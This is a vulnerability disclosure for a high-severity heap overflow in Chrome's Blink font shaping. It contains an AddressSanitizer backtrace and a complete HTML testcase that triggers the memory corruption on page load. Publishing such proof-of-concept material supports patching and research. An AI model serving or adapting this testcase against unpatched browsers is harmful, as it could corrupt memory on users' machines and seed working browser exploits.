
CVE Details
Google Chrome
August 21, 2024 – Heap buffer overflow in Fonts in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Chromium security severity: High
Credit: Tashita Software Security
Researcher: Javier
Vulnerability Details
Bug
Heap-buffer-overflow in the Blink renderer leads to a segmentation fault: Received signal 11 SEGV_ACCERR 36a0002be000
Backtrace
==2004788==ERROR: AddressSanitizer: use-after-poison on address 0x5030000bc57c at pc 0x55eb46a3039f bp 0x7ffc3285d450 sp 0x7ffc3285d448
READ of size 2 at 0x5030000bc57c thread T0 (chrome)
#0 0x55eb46a3039e in Consume third_party/blink/renderer/platform/fonts/utf16_text_iterator.h:54:17
#1 0x55eb46a3039e in blink::HarfBuzzShaper::CollectFallbackHintChars(WTF::Deque<blink::ReshapeQueueItem, 0u, WTF::PartitionAllocator> const&, bool, WTF::Vector<int, 16u, WTF::PartitionAllocator>&) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:722:21
#2 0x55eb46a31475 in blink::HarfBuzzShaper::ShapeSegment(blink::RangeContext*, blink::RunSegmenter::RunSegmenterRange const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:887:12
Testcase
<html>
<head>
<style>
::first-letter {
counter-increment : none;
}
audio {
min-width : 111%;
}
* {
float : left;
}
::first-line {
grid-row-gap : 68%;
}
#id_3 {
font-size-adjust : 45;
}
#id_4 {
container-type : inline-size;
}
::before {
content : open-quote;
}
:last-of-type {
margin-inline : -97.2296906% 343.788818%;
}
mark {
all : revert;
}
</style>
<script>
function trigger() {
let var_1 = document.getElementById("id_1");
let var_2 = document.getElementById("id_2");
var_1.replaceWith(var_2);
}
</script>
</head>
<body onload="trigger()">
<any_tag>
<any_tag></any_tag>
</any_tag>
<small></small>
<canvas id="id_4"></canvas>
<any_tag id="id_2"></any_tag>
<details></details>
<any_tag>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK6apS,q-f! Fqv4rK.Z.NJP p&K+rCV:~trm65&H</any_tag>
<any_tag></any_tag>
<any_tag>
<any_tag id="id_1"></any_tag>
</any_tag>
<mark>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</mark>
<mark>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?A</mark>
<any_tag>
<any_tag id="id_3">AAAAAAAAAA
</any_tag>
</any_tag>
</body>
</html>